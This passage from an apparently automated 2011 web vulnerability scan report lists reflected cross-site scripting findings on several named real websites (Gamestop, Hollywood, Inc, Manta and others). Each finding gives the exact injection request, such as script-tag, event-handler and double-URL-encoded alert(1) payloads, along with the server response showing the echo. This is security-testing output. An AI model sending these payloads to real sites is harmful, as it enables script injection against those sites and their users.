This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico599e8'a%3d'b'629f0608bc6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:33:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Fri, 02-Apr-2021 13:33:25 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: LandingUrl=http://www.gamestop.com/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico599e8'a='b'629f0608bc6; path=/
Set-Cookie: CampaignHistory=; path=/
Set-Cookie: BIGipServerwww.gamestop.com-80=600446124.20480.0000; path=/
Content-Length: 181788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico599e8'a='b'629f0608bc6' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

6.48. http://www.gather.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12711<img%20src%3da%20onerror%3dalert(1)>929de4ce53b was submitted in the REST URL parameter 1. This input was echoed as 12711<img src=a onerror=alert(1)>929de4ce53b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /12711<img%20src%3da%20onerror%3dalert(1)>929de4ce53b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:22 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=4A24C55EA8AA587CCF8856C6C9BFB24A; Domain=.gather.com; Path=/
Set-Cookie: vis=RyOcPuDxMFUGP3B0WVrMrdgk+Fv7TLiAW3OByYniiiDpLR+P/Pm0tG1Nows/zVLDfFPcwb2RlnPBjDhfuWVzAqWnKeeDBF1/gMVhlwJ1RSc=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:22 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=KW1zZbLcDLkbttCjTEPka5YrQnepZ8pHskgphI0gOdszkdWMqudZ95Jb7/76/tOlkeRmmJL7fpmjoICIH6sXwwAd09L9KZQWlUI0WxvLZi3sfdXOAhI/xZQCjpJNlT+R; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:22 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17544
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>12711<img src=a onerror=alert(1)>929de4ce53b</em>
...[SNIP]...

6.49. http://www.gather.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3197c"><a>1af48c031bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /3197c"><a>1af48c031bb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=DA1461106BFAE965E4902BC6A28B47D8; Domain=.gather.com; Path=/
Set-Cookie: vis=UjjmQmSy0/vTCt18edV5yG7Hdy8T9xl9k7Es17tCqMMJpFjxuqlR5UcQ461iN1fmmD5JU4aHsvhJi8Y6SPee6UXzWH78Piq8kZfJO9L+2ZU=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=3O1JaJHhBrlqO2HsxQwvvNgk+Fv7TLiAn1BRbSOCyEOukF3ZG9POyIobiPsZ/q8ko5SAnn39resA8mu0ppEVBXCt9+uNQE6iPrjrPjwNPHYdyAEmmABmC03bbftbh5TG; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17459
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="3197c"><a>1af48c031bb" >
...[SNIP]...

6.50. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98084"><script>alert(1)</script>c7f5e1781ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico98084"><script>alert(1)</script>c7f5e1781ab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gourmandia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:57:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=m5h7u4477a8qnj9sg8pmkq0895; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<title>4
...[SNIP]...
<form id="testform" action="/404.php/favicon.ico98084"><script>alert(1)</script>c7f5e1781ab" method="post">
...[SNIP]...

6.51. http://www.healthline.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e4f5'%3bd3fe8a4b78d was submitted in the REST URL parameter 1. This input was echoed as 6e4f5';d3fe8a4b78d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico6e4f5'%3bd3fe8a4b78d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51348

<!--
URI: /favicon.ico6e4f5';d3fe8a4b78dservletName: defaultstatusCode: 404
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<
...[SNIP]...
anguage="JavaScript" src="http://ad.doubleclick.net/adj/hn.us.hl.er.x.x.x/none' + btk1 + btk2 + ';kw=generalhealth;k1=none;k2=none;k3=health;pos=lb;ac=32688|32431|32457|35032|32461;pv=;url=/favicon.ico6e4f5';d3fe8a4b78d;type=top_rb;bf=no;tile=' + dfpTileIdx++ + ';sz=728x90;dcopt=ist;ord=' + hlnord + ';u=generalhealth|none|none|health|32688,32431,32457,35032,32461|lb||||/favicon.ico6e4f5';d3fe8a4b78d|top_rb||?" type="
...[SNIP]...

6.52. http://www.healthline.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c252"%3b2599a835db0 was submitted in the REST URL parameter 1. This input was echoed as 7c252";2599a835db0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico7c252"%3b2599a835db0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51348

<!--
URI: /favicon.ico7c252";2599a835db0servletName: defaultstatusCode: 404
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<
...[SNIP]...
cadc=0;var erpm=0;
/*var unicaEvents = new Array();
var unicaEventIdx = 0;*/
var g_cfn="generalhealth";
var g_cfn_bold = "generalhealth";
var g_encoded_uri = encodeURI("/favicon.ico7c252";2599a835db0");
</script>
...[SNIP]...

6.53. http://www.hollywood.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywood.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d966%2522%253balert%25281%2529%252f%252f0182ae2d622 was submitted in the REST URL parameter 1. This input was echoed as 2d966";alert(1)//0182ae2d622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico2d966%2522%253balert%25281%2529%252f%252f0182ae2d622 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zb0r3g55zp22f1foo3vkycei; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hollywood.com </title>
<script type="text
...[SNIP]...
function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="h.hollywood.com";
hbx.acct="DM550817IOBZ38EN3";
hbx.pn="404/favicon.ico2d966";alert(1)//0182ae2d622";
hbx.mlc="Error";hbx.pndef="";hbx.ctdef="full";hbx.lt="auto";
hbx.dlf="n";
</script>
...[SNIP]...

6.54. http://www.inc.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b186"><script>alert(1)</script>7e885573fb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4b186"><script>alert(1)</script>7e885573fb4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:20:54 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 40001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="returl" value="http://www.inc.com/favicon.ico4b186"><script>alert(1)</script>7e885573fb4">
...[SNIP]...

6.55. http://www.instructables.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 492f7<script>alert(1)</script>1ee22699fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico492f7<script>alert(1)</script>1ee22699fd5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instructables.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
Cache-Control: no-cache
X-Cacheable: no-404
Content-Length: 17716
Date: Sat, 02 Apr 2011 13:37:19 GMT
X-Varnish: 4085213196
Age: 0
Via: 1.1 varnish
X-Cache-Svr: squid03.instructables.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<p>
&nbsp;&nbsp;We're sorry, the URL http://www.instructables.com/favicon.ico492f7<script>alert(1)</script>1ee22699fd5 is either incorrect or no longer available. Maybe you are looking for one of the following Instructables below.
</p>
...[SNIP]...

6.56. http://www.kaboose.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4633</script><script>alert(1)</script>ef96f9ca301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof4633</script><script>alert(1)</script>ef96f9ca301 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaboose.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:52 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: ad_types_404.html=itype%3DBanner2%26itype%3DSponsorLink2%26itype%3DSponsorLink1%26itype%3DRectangle2%26itype%3DSponsorFeature%26itype%3DRectangle%26itype%3DSponsorBar%26itype%3DSkyscraper-Left%26itype%3DSponsorLogo%26itype%3DPeelback2%26itype%3DOverPage%26itype%3DInterstitial%26itype%3DCatfish%26itype%3DPeelback%26itype%3DBanner; expires=Sat, 02 Apr 2011 13:44:52 GMT
Content-Type: text/html; charset=utf-8
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 86182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<he
...[SNIP]...
<script type="text/javascript">
mboxCreate('KAB_Global_Mbox', "pageName=www.kaboose.com/favicon.icof4633</script><script>alert(1)</script>ef96f9ca301");
</script>
...[SNIP]...

6.57. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0854"><script>alert(1)</script>62f1be08ee8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc0854"><script>alert(1)</script>62f1be08ee8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22702

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6772046&amp;c3=&amp;c4=www.letssingit.com/favicon.icoc0854"><script>alert(1)</script>62f1be08ee8&amp;c5=&amp;c6=&amp;c15=&amp;cj=1"/>
...[SNIP]...

6.58. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc674"-alert(1)-"1a90c41c69d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocc674"-alert(1)-"1a90c41c69d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.letssingit.com/favicon.icocc674"-alert(1)-"1a90c41c69d",c5:"",c6:"",c15:""});</script>
...[SNIP]...

6.59. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mainstreet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5ac2"><script>alert(1)</script>25e47d014c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof5ac2"><script>alert(1)</script>25e47d014c2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mainstreet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:47 GMT
Server: Apache
Set-Cookie: SESS0e250a232fad80ec5d88c23e55d760d9=u0phpluvnnfdapsm79149neq37; expires=Mon, 25 Apr 2011 17:38:07 GMT; path=/; domain=.mainstreet.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:04:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
X-Debug: msweb04
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Node type: site_content (4100)
Node title: 404 Page
Last Generated: 20110
...[SNIP]...
<link rel="canonical" href="http://www.mainstreet.com/favicon.icof5ac2"><script>alert(1)</script>25e47d014c2" />
...[SNIP]...

6.60. http://www.manta.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6ae0<script>alert(1)</script>b625fad29ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof6ae0<script>alert(1)</script>b625fad29ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:43:10 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4714
X-Varnish: 2363475455
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.icof6ae0<script>alert(1)</script>b625fad29ae at Sat Apr 2 12:43:10 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

6.61. http://www.manta.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d5c"><script>alert(1)</script>8122b86cb15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico56d5c"><script>alert(1)</script>8122b86cb15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:43:10 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4718
X-Varnish: 2363475440
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico56d5c"><script>alert(1)</script>8122b86cb15 at Sat Apr 2 12:43:10 2011 +0000 from 173.193.214.243">
...[SNIP]...

6.62. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b779f<script>alert(1)</script>fb24f2fd142 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?b779f<script>alert(1)</script>fb24f2fd142=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:42:43 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4720
X-Varnish: 3115951942
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.ico?b779f<script>alert(1)</script>fb24f2fd142=1 at Sat Apr 2 12:42:43 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

6.63. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c655a"><script>alert(1)</script>db5a4dbfb1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c655a"><script>alert(1)</script>db5a4dbfb1a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:42:43 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4724
X-Varnish: 1295727862
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
